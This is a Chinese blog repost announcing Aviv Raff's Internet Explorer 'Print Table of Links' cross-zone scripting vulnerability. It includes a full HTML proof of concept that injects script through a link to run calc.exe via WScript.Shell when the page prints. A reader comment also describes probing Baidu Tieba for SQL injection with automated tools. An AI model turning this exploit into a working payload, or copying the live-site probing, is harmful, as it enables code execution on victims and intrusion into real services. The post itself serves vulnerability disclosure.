Aviv Raff的IE0day,公布了

来源:Sowhat的blog

前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)

重现:
1.下面这个地方打上勾

2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(‘WScript.Shell’);x.Run(‘calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

相关日志

楼被抢了 8 层了... 抢座Rss 2.0或者 Trackback

  • 可酷可乐

    你这站怎么早晨挂了?

  • 鬼仔

    当时服务器貌似在升级

  • marlboro

    刚才发现百度 贴吧 有注入的地方 提交1=1 和1=2 时 出现的页面不同
    用阿D第一次检测是SA权限 第二次检测出又是DB权限
    不过用 HDSI和pangolin 却检测不出来 不知道什么原因···

  • hellboy

    可能是误报

  • www

    前一段时间浏览sina的blog老弹打印窗口 难道。。。。

  • Knell

    to marlboro :

    膜拜………………………

  • wszf

    to marlboro :

    膜拜………………………

发表评论